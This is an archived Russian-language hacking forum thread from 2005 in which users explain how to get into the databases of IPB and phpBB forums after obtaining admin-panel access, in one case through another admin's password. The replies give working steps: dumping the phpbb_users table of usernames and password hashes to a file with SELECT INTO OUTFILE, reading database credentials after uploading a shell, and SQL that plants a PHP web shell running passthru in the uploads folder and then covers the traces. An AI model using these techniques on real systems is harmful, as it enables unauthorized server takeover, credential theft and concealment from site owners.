PDA

Просмотр полной версии : Можно ли ли получить доступ к Базе даных,имеея доступ к админке в движке Ipb ?


*Crimson*
24.12.2005, 03:29
Можно ли ли получить доступ к Базе даных..имеея доступ к админке...в движке Ipb ?

Grrl
24.12.2005, 07:06
идем в SQL Management->mySQL Toolbox внизу в окне можно выполнять sql запросы.

vorishka
24.12.2005, 11:53
У некоторых там есть и бэкап БД где-то внизу...

*Crimson*
24.12.2005, 12:53
пасиба....
счас посматрю...

lka
26.12.2005, 02:12
Такой же вопрос, только форум phpbb. Конкретно нужна таблица phpbb_users. Есть пароль одного из админов, могу заходить в админский раздел. При попытке сделать копию БД, частично копирует, потом пишет:
SQL Error : 2013 Lost connection to MySQL server during query
SELECT * FROM phpbb_posts
и всё, видимо, битая таблица (при этом структуру БД копировать можно, а толку?). Сжатие в gzip не работает (сервер не отвечает). Если дописать phpbb_users как отдельную таблицу, то тоже не копирует, т. к. должен её прицеплять в конец, а затыкается раньше (SQL Error...).
Версия форума 2.0.11. Кто-нибудь посоветовать что-то может?

NaX[no]rT
26.12.2005, 02:22
Если знаешь полный путь слей её в файл командой
SELECT username,user_password INTO OUTFILE 'полный путь до файла' FROM phpbb_users
При условии что можешь выполнять SQL команды

FQziT
26.12.2005, 02:43
Если речь идёт о форумах IPB и есть возможность залить шелл, то заливаешь его, потом смотришь в корне форума в файле conf_global.php имя юзера и пароль БД, потом заливаешь урезанный PHPMyadmin от rst.void.ru, заходишь туда, вводишь логин и пасс и ты в БД и делай, что хочешь.
Про репу не забываем, если хоть чем-то помог ;-)

Grrl
27.12.2005, 04:06
если конкретно для ipb то шел легко заливается командами (если хватит прав естессно)

UPDATE ibf_members SET name='<? passthru("$cmd"); ?>'WHERE id='0';

SELECT name FROM `ibf_members` WHERE id='0' INTO OUTFILE '/PATH_TO_FORUM/uploads/shell.php';

потом прибираемся за собой
UPDATE ibf_members SET name='Guest'WHERE id='0';

и ищем наш шел в uploads

WizART
04.01.2006, 22:10
Такой же вопрос, только форум phpbb. Конкретно нужна таблица phpbb_users. Есть пароль одного из админов, могу заходить в админский раздел. При попытке сделать копию БД, частично копирует, потом пишет:
SQL Error : 2013 Lost connection to MySQL server during query
SELECT * FROM phpbb_posts
и всё, видимо, битая таблица (при этом структуру БД копировать можно, а толку?). Сжатие в gzip не работает (сервер не отвечает). Если дописать phpbb_users как отдельную таблицу, то тоже не копирует, т. к. должен её прицеплять в конец, а затыкается раньше (SQL Error...).
Версия форума 2.0.11. Кто-нибудь посоветовать что-то может?
gzip отключи и будет тебе счастье в виде *.sql (вроде-бы);)